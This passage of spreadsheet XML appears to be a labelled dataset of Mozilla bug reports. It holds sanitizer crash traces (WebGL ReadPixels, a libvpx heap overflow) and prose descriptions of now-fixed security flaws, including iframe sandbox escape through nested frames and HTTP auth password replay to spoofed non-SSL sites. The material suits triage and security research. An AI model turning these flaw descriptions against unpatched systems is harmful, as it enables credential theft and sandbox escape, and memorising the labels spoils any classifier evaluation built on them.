    #2 0x7fb44b261ef9 in mozilla::ClientWebGLContext::ReadPixels(int, int, int, int, unsigned int, unsigned int, mozilla::dom::ArrayBufferView_base&lt;&amp;(js::UnwrapArrayBufferView(JSObject*)), &amp;(js::GetArrayBufferViewLengthAndData(JSObject*, unsigned int*, bool*, unsigned char**)), &amp;(JS_GetArrayBufferViewType(JSObject*))&gt; const&amp;, unsigned int, mozilla::dom::CallerType, mozilla::ErrorResult&amp;) const /builds/worker/workspace/build/src/dom/canvas/ClientWebGLContext.cpp:3960:43
    #3 0x7fb44a87f364 in mozilla::ClientWebGLContext::ReadPixels(int, int, int, int, unsigned int, unsigned int, mozilla::dom::Nullable&lt;mozilla::dom::ArrayBufferView_base&lt;&amp;(js::UnwrapArrayBufferView(JSObject*)), &amp;(js::GetArrayBufferViewLengthAndData(JSObject*, unsigned int*, bool*, unsigned char**)), &amp;(JS_GetArrayBufferViewType(JSObject*))&gt; &gt; const&amp;, mozilla::dom::CallerType, mozilla::ErrorResult&amp;) const /builds/worker/workspace/build/src/dom/canvas/ClientWebGLContext.h:1946:5
    #4 0x7fb44a9041bf in mozilla::dom::WebGLRenderingContext_Binding::readPixels(JSContext*, JS::Handle&lt;JSObject*&gt;, void*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WebGLRenderingContextBinding.cpp:13567:24
    #5 0x7fb44b114138 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3171:13
    #6 0x7fb4515f4473 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:13
    #7 0x7fb4515f4473 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:569:12
    #8 0x7fb4515f626a in InternalCall(JSContext*, js::AnyInvokeArgs const&amp;, js::CallReason) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:632:10
    #9 0x7fb4515daca7 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:636:10
    #10 0x7fb4515daca7 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3049:16
    #11 0x7fb4515be191 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:449:10
    #12 0x7fb4515f4555 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:604:13
    #13 0x7fb4515f626a in InternalCall(JSContext*, js::AnyInvokeArgs const&amp;, js::CallReason) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:632:10
    #14 0x7fb4515f6546 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:649:8
    #15 0x7fb451792be2 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2797:10
    #16 0x7fb44ad2d140 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:52:8
    #17 0x7fb44b7ddfcb in void mozilla::dom::EventListener::HandleEvent&lt;mozilla::dom::EventTarget*&gt;(mozilla::dom::EventTarget* const&amp;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:66:12
    #18 0x7fb44b7dda04 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1073:43
    #19 0x7fb44b7df066 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1271:17
    #20 0x7fb44b7ccd4f in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&amp;, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:356:17
    #21 0x7fb44b7cb2a1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:558:16
    #22 0x7fb44b7cfd5b in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1055:11
    #23 0x7fb44de1722e in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1144:7
    #24 0x7fb450955f07 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6084:20
    #25 0x7fb4509550b5 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5867:7
    #26 0x7fb450959b1f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #27 0x7fb447f6fde0 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1348:3
    #28 0x7fb447f6ed6c in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:907:14
    #29 0x7fb447f6b040 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:727:9
    #30 0x7fb447f6d873 in nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:615:5
    #31 0x7fb447f6e8fc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
    #32 0x7fb4457fc6f7 in mozilla::net::nsLoadGroup::NotifyRemovalObservers(nsIRequest*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:604:22
    #33 0x7fb4457ff907 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:511:10
    #34 0x7fb4495102ff in mozilla::dom::Document::DoUnblockOnload() /builds/worker/workspace/build/src/dom/base/Document.cpp:10746:18
    #35 0x7fb4494c5eac in mozilla::dom::Document::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/Document.cpp:10678:9
    #36 0x7fb4494eadfc in mozilla::dom::Document::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/Document.cpp:7349:3
    #37 0x7fb4495b6bd4 in applyImpl&lt;mozilla::dom::Document, void (mozilla::dom::Document::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1160:12
    #38 0x7fb4495b6bd4 in apply&lt;mozilla::dom::Document, void (mozilla::dom::Document::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1166:12
    #39 0x7fb4495b6bd4 in mozilla::detail::RunnableMethodImpl&lt;mozilla::dom::Document*, void (mozilla::dom::Document::*)(), true, (mozilla::RunnableKind)0&gt;::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1212:13
    #40 0x7fb44553e68d in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:282:20
    #41 0x7fb445572c98 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1220:14
    #42 0x7fb44557dafc in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:481:10
    #43 0x7fb4467d3e9f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:87:21
    #44 0x7fb4466c70c7 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #45 0x7fb4466c70c7 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308:3
    #46 0x7fb4466c70c7 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290:3
    #47 0x7fb44d85b3d8 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #48 0x7fb45138e3c6 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:944:20
    #49 0x7fb4466c70c7 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #50 0x7fb4466c70c7 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308:3
    #51 0x7fb4466c70c7 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290:3
    #52 0x7fb45138d989 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:779:34
    #53 0x563326dbe433 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #54 0x563326dbe433 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:303:18
    #55 0x7fb468147b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /build/glibc-OTsEL5/glibc-2.27/string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:134 in memcpy
```</t>
        </is>
      </c>
      <c r="X786" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="787">
      <c r="A787" t="n">
        <v>1395123</v>
      </c>
      <c r="B787" t="inlineStr">
        <is>
          <t>2017-08-30 04:55:57 -0700</t>
        </is>
      </c>
      <c r="C787" t="inlineStr">
        <is>
          <t>Unhide credit cards sync engine by default</t>
        </is>
      </c>
      <c r="D787" t="inlineStr">
        <is>
          <t>2017-11-06 15:07:47 -0800</t>
        </is>
      </c>
      <c r="E787" t="n">
        <v>1</v>
      </c>
      <c r="F787" t="n">
        <v>1</v>
      </c>
      <c r="G787" t="n">
        <v>2</v>
      </c>
      <c r="H787" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I787" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J787" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K787" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L787" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M787" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N787" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O787" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P787" t="inlineStr">
        <is>
          <t>[form autofill:M4]</t>
        </is>
      </c>
      <c r="Q787" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R787" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S787" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T787" t="n">
        <v>1</v>
      </c>
      <c r="U787" t="n">
        <v>0</v>
      </c>
      <c r="V787" t="n">
        <v>8</v>
      </c>
      <c r="W787" t="inlineStr">
        <is>
          <t>We should enable the "creditcards" sync engine when form autofill feature is available.</t>
        </is>
      </c>
      <c r="X787" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="788">
      <c r="A788" t="n">
        <v>849791</v>
      </c>
      <c r="B788" t="inlineStr">
        <is>
          <t>2013-03-11 06:07:04 -0700</t>
        </is>
      </c>
      <c r="C788" t="inlineStr">
        <is>
          <t>Frame DocShells do not inherit sandbox flags from their parents.</t>
        </is>
      </c>
      <c r="D788" t="inlineStr">
        <is>
          <t>2014-11-19 19:48:14 -0800</t>
        </is>
      </c>
      <c r="E788" t="n">
        <v>1</v>
      </c>
      <c r="F788" t="n">
        <v>1</v>
      </c>
      <c r="G788" t="n">
        <v>3</v>
      </c>
      <c r="H788" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I788" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J788" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K788" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L788" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M788" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N788" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O788" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P788" t="inlineStr">
        <is>
          <t>[adv-main22+]</t>
        </is>
      </c>
      <c r="Q788" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R788" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S788" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T788" t="n">
        <v>1</v>
      </c>
      <c r="U788" t="n">
        <v>0</v>
      </c>
      <c r="V788" t="n">
        <v>11</v>
      </c>
      <c r="W788" t="inlineStr">
        <is>
          <t>At the moment the sandbox flags aren't copied to a new frame's DocShell.
So, if someone has a site that other people are hosting in a sandboxed iframe, they can just add a frame to their site and they're suddenly not sandboxed at all.
I believe the problem is in content/base/src/nsFrameLoader.cpp
  // Is this an &lt;iframe&gt; with a sandbox attribute or a parent which is
  // sandboxed ?
  HTMLIFrameElement* iframe =
    HTMLIFrameElement::FromContent(mOwnerContent);
  uint32_t sandboxFlags = 0;
  if (iframe) {
    sandboxFlags = iframe-&gt;GetSandboxFlags();
    uint32_t parentSandboxFlags = iframe-&gt;OwnerDoc()-&gt;GetSandboxFlags();
    if (sandboxFlags || parentSandboxFlags) {
      // The child can only add restrictions, not remove them.
      sandboxFlags |= parentSandboxFlags;
      mDocShell-&gt;SetSandboxFlags(sandboxFlags);
    }
  }
It only checks to see if the parent is sandboxed, if it is an iframe element.
I haven't got time to add a test case at the moment, I'll try and add one later.</t>
        </is>
      </c>
      <c r="X788" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="789">
      <c r="A789" t="n">
        <v>226278</v>
      </c>
      <c r="B789" t="inlineStr">
        <is>
          <t>2003-11-19 17:12:25 -0800</t>
        </is>
      </c>
      <c r="C789" t="inlineStr">
        <is>
          <t>Password cache for http auth should remember if the site was secure</t>
        </is>
      </c>
      <c r="D789" t="inlineStr">
        <is>
          <t>2011-08-05 21:30:16 -0700</t>
        </is>
      </c>
      <c r="E789" t="n">
        <v>1</v>
      </c>
      <c r="F789" t="n">
        <v>1</v>
      </c>
      <c r="G789" t="n">
        <v>3</v>
      </c>
      <c r="H789" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I789" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J789" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K789" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L789" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M789" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N789" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O789" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P789" t="inlineStr">
        <is>
          <t>[sg:fix]security</t>
        </is>
      </c>
      <c r="Q789" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R789" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S789" t="inlineStr">
        <is>
          <t>mozilla1.7final</t>
        </is>
      </c>
      <c r="T789" t="n">
        <v>1</v>
      </c>
      <c r="U789" t="n">
        <v>0</v>
      </c>
      <c r="V789" t="n">
        <v>41</v>
      </c>
      <c r="W789" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.5a) Gecko/20030728 Mozilla Firebird/0.6.1
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.5a) Gecko/20030728 Mozilla Firebird/0.6.1
Forgive me if I'm missing something, but browsing through the code it appears
that the password cache for HTTP, remembers realm, hostname and port, to
determine if it should replay a password to a site that it had seen previously.
 I believe the list should actually be realm, hostname, port, and whether it was
a secure site.  Just because a site is on port 443 it does not mean that the
site is under SSL.   
An attacker could allow you to enter your password to your secure site, then
latter during the same browsing session spoof DNS for a non-ssl version of the
same url you hit previously on the same port.  Your browser would happily send 
your password to them, no SSL required.
I haven't had time to test this theory.
Reproducible: Didn't try
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X789" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="790">
      <c r="A790" t="n">
        <v>1177948</v>
      </c>
      <c r="B790" t="inlineStr">
        <is>
          <t>2015-06-26 17:11:04 -0700</t>
        </is>
      </c>
      <c r="C790" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow WRITE in resize_context_buffers</t>
        </is>
      </c>
      <c r="D790" t="inlineStr">
        <is>
          <t>2024-05-30 09:02:41 -0700</t>
        </is>
      </c>
      <c r="E790" t="n">
        <v>1</v>
      </c>
      <c r="F790" t="n">
        <v>1</v>
      </c>
      <c r="G790" t="n">
        <v>3</v>
      </c>
      <c r="H790" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I790" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J790" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K790" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L790" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M790" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N790" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O790" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P790" t="inlineStr">
        <is>
          <t>[adv-main40+]</t>
        </is>
      </c>
      <c r="Q790" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R790" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S790" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T790" t="n">
        <v>1</v>
      </c>
      <c r="U790" t="n">
        <v>0</v>
      </c>
      <c r="V790" t="n">
        <v>18</v>
      </c>
      <c r="W790" t="inlineStr">
        <is>
          <t>Created attachment 8626831
webmt.zip
Need to load this testcase over http to see instant crash. I think your libvpx copy is old, it is best to update it since we have found several others that were fixed recently.
==15811==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61f00006e29c at pc 0x7f617614b7d9 bp 0x7f614e38ab30 sp 0x7f614e38ab28
WRITE of size 4 at 0x61f00006e29c thread T22 (MediaPl~back #2)
    #0 0x7f617614b7d8 in resize_context_buffers media/libvpx/vp9/decoder/vp9_decodeframe.c:681:26
    #1 0x7f617614ae89 in setup_frame_size media/libvpx/vp9/decoder/vp9_decodeframe.c:721:3
    #2 0x7f61761402e7 in vp9_decode_frame media/libvpx/vp9/decoder/vp9_decodeframe.c:1368:5
    #3 0x7f617615e171 in vp9_receive_compressed_data media/libvpx/vp9/decoder/vp9_decoder.c:356:3
    #4 0x7f61762ec37b in frame_worker_hook media/libvpx/vp9/vp9_dx_iface.c:322:7
    #5 0x7f61760faca6 in execute media/libvpx/vp9/common/vp9_thread.c:134:27
    #6 0x7f61762eba0d in decode_one media/libvpx/vp9/vp9_dx_iface.c:493:5
    #7 0x7f61762e5437 in decoder_decode media/libvpx/vp9/vp9_dx_iface.c:686:37
    #8 0x7f61762ed2f7 in vpx_codec_decode media/libvpx/vpx/src/vpx_decoder.c:122:11
    #9 0x7f6173224e5f in mozilla::SoftwareWebMVideoDecoder::DecodeVideoFrame(bool&amp;, long) dom/media/webm/SoftwareWebMVideoDecoder.cpp:149:7
    #10 0x7f6172dedc19 in mozilla::MediaDecoderReader::RequestVideoData(bool, long) dom/media/MediaDecoderReader.cpp:277:10
    #11 0x7f6172ee1a6d in mozilla::detail::MethodCallWithTwoArgs&lt;mozilla::MediaPromise&lt;nsRefPtr&lt;mozilla::VideoData&gt;, mozilla::MediaDecoderReader::NotDecodedReason, true&gt;, mozilla::MediaDecoderReader, bool, long&gt;::Invoke() objdir-ff-asan/dist/include/MediaPromise.h:902:52
    #12 0x7f6172ee1d83 in mozilla::detail::ProxyRunnable&lt;mozilla::MediaPromise&lt;nsRefPtr&lt;mozilla::VideoData&gt;, mozilla::MediaDecoderReader::NotDecodedReason, true&gt; &gt;::Run() objdir-ff-asan/dist/include/MediaPromise.h:919:31
    #13 0x7f6172d9d12c in mozilla::AutoTaskDispatcher::TaskGroupRunnable::Run() dom/media/TaskDispatcher.h:181:11
    #14 0x7f6172f295b9 in mozilla::MediaTaskQueue::Runner::Run() dom/media/MediaTaskQueue.cpp:256:5
    #15 0x7f616e4c353e in nsThreadPool::Run() xpcom/threads/nsThreadPool.cpp:221:7
    #16 0x7f616e4c3b1c in non-virtual thunk to nsThreadPool::Run() xpcom/threads/nsThreadPool.cpp:151:15
    #17 0x7f616e4bd1b6 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:848:7
    #18 0x7f616e53419c in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:265:10
    #19 0x7f616ede4906 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:326:20
    #20 0x7f616ed6e6a1 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:234:3
    #21 0x7f616e4b9c51 in nsThread::ThreadFunc(void*) xpcom/threads/nsThread.cpp:360:5
    #22 0x7f617bca0ffa in _pt_root nsprpub/pr/src/pthreads/ptthread.c:212:5
    #23 0x7f617c2e5181 in start_thread /build/buildd/eglibc-2.19/nptl/pthread_create.c:312
0x61f00006e29f is located 0 bytes to the right of 3103-byte region [0x61f00006d680,0x61f00006e29f)
allocated by thread T24 (MediaPl~back #3) here:
    #0 0x4b6338 in __interceptor_malloc _asan_rtl_
    #1 0x7f61762ef186 in vpx_calloc media/libvpx/vpx_mem/vpx_mem.c:126:10
    #2 0x7f61762e446a in decoder_decode media/libvpx/vp9/vp9_dx_iface.c:372:36
    #3 0x7f61762ed2f7 in vpx_codec_decode media/libvpx/vpx/src/vpx_decoder.c:122:11
    #4 0x7f6173224e5f in mozilla::SoftwareWebMVideoDecoder::DecodeVideoFrame(bool&amp;, long) dom/media/webm/SoftwareWebMVideoDecoder.cpp:149:7
    #5 0x7f6172dedc19 in mozilla::MediaDecoderReader::RequestVideoData(bool, long) dom/media/MediaDecoderReader.cpp:277:10
    #6 0x7f6172ee1a6d in mozilla::detail::MethodCallWithTwoArgs&lt;mozilla::MediaPromise&lt;nsRefPtr&lt;mozilla::VideoData&gt;, mozilla::MediaDecoderReader::NotDecodedReason, true&gt;, mozilla::MediaDecoderReader, bool, long&gt;::Invoke() objdir-ff-asan/dist/include/MediaPromise.h:902:52
    #7 0x7f6172ee1d83 in mozilla::detail::ProxyRunnable&lt;mozilla::MediaPromise&lt;nsRefPtr&lt;mozilla::VideoData&gt;, mozilla::MediaDecoderReader::NotDecodedReason, true&gt; &gt;::Run() objdir-ff-asan/dist/include/MediaPromise.h:919:31
    #8 0x7f6172d9d12c in mozilla::AutoTaskDispatcher::TaskGroupRunnable::Run() dom/media/TaskDispatcher.h:181:11
    #9 0x7f6172f295b9 in mozilla::MediaTaskQueue::Runner::Run() dom/media/MediaTaskQueue.cpp:256:5
    #10 0x7f616e4c353e in nsThreadPool::Run() xpcom/threads/nsThreadPool.cpp:221:7
    #11 0x7f616e4c3b1c in non-virtual thunk to nsThreadPool::Run() xpcom/threads/nsThreadPool.cpp:151:15
    #12 0x7f616e4bd1b6 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:848:7
    #13 0x7f616e53419c in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:265:10
    #14 0x7f616ede4a82 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:355:5
    #15 0x7f616ed6e6a1 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:234:3
    #16 0x7f616e4b9c51 in nsThread::ThreadFunc(void*) xpcom/threads/nsThread.cpp:360:5
    #17 0x7f617bca0ffa in _pt_root nsprpub/pr/src/pthreads/ptthread.c:212:5
    #18 0x7f617c2e5181 in start_thread /build/buildd/eglibc-2.19/nptl/pthread_create.c:312
Thread T22 (MediaPl~back #2) created by T0 (Web Content) here:
    #0 0x430269 in pthread_create _asan_rtl_
    #1 0x7f617bc9ddbf in _PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:453:14
    #2 0x7f617bc9d9ea in PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:544:12
    #3 0x7f616e4bb016 in nsThread::Init() xpcom/threads/nsThread.cpp:470:19
    #4 0x7f616e4c0d1f in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) xpcom/threads/nsThreadManager.cpp:253:17
    #5 0x7f616e4c248d in nsThreadPool::PutEvent(nsIRunnable*) xpcom/threads/nsThreadPool.cpp:102:3
    #6 0x7f616e4c3f8a in nsThreadPool::Dispatch(nsIRunnable*, unsigned int) xpcom/threads/nsThreadPool.cpp:262:5
    #7 0x7f6172f27dce in mozilla::MediaTaskQueue::DispatchLocked(already_AddRefed&lt;nsIRunnable&gt;, mozilla::MediaTaskQueue::DispatchMode, mozilla::AbstractThread::DispatchFailureHandling, mozilla::AbstractThread::DispatchReason) dom/media/MediaTaskQueue.cpp:65:17
    #8 0x7f6172e8b4ff in mozilla::MediaTaskQueue::Dispatch(already_AddRefed&lt;nsIRunnable&gt;, mozilla::AbstractThread::DispatchFailureHandling, mozilla::AbstractThread::DispatchReason) objdir-ff-asan/dist/include/MediaTaskQueue.h:52:19
    #9 0x7f6172d9bcc8 in mozilla::AutoTaskDispatcher::~AutoTaskDispatcher() dom/media/TaskDispatcher.h:233:5
    #10 0x7f6172d9b8d7 in mozilla::XPCOMThreadWrapper::FireTailDispatcher() objdir-ff-asan/dist/include/mozilla/Maybe.h:373:7
    #11 0x7f6172d9df20 in nsRunnableMethodImpl&lt;void (mozilla::XPCOMThreadWrapper::*)(), true&gt;::Run() objdir-ff-asan/dist/include/nsThreadUtils.h:618:5
    #12 0x7f6173e669c1 in nsBaseAppShell::RunSyncSectionsInternal(bool, unsigned int) widget/nsBaseAppShell.cpp:376:7
    #13 0x7f6173e67c9e in non-virtual thunk to nsBaseAppShell::AfterProcessNextEvent(nsIThreadInternal*, unsigned int, bool) widget/nsBaseAppShell.h:95:7
    #14 0x7f616e4bd613 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:862:5
    #15 0x7f616e53419c in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:265:10
    #16 0x7f616ede3b2e in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:95:21
    #17 0x7f616ed6e6a1 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:234:3
    #18 0x7f6173e6524f in nsBaseAppShell::Run() widget/nsBaseAppShell.cpp:165:3
    #19 0x7f6175d451f3 in XRE_RunAppShell toolkit/xre/nsEmbedFunctions.cpp:778:12
    #20 0x7f616ed6e6a1 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:234:3
    #21 0x7f6175d44717 in XRE_InitChildProcess toolkit/xre/nsEmbedFunctions.cpp:614:7
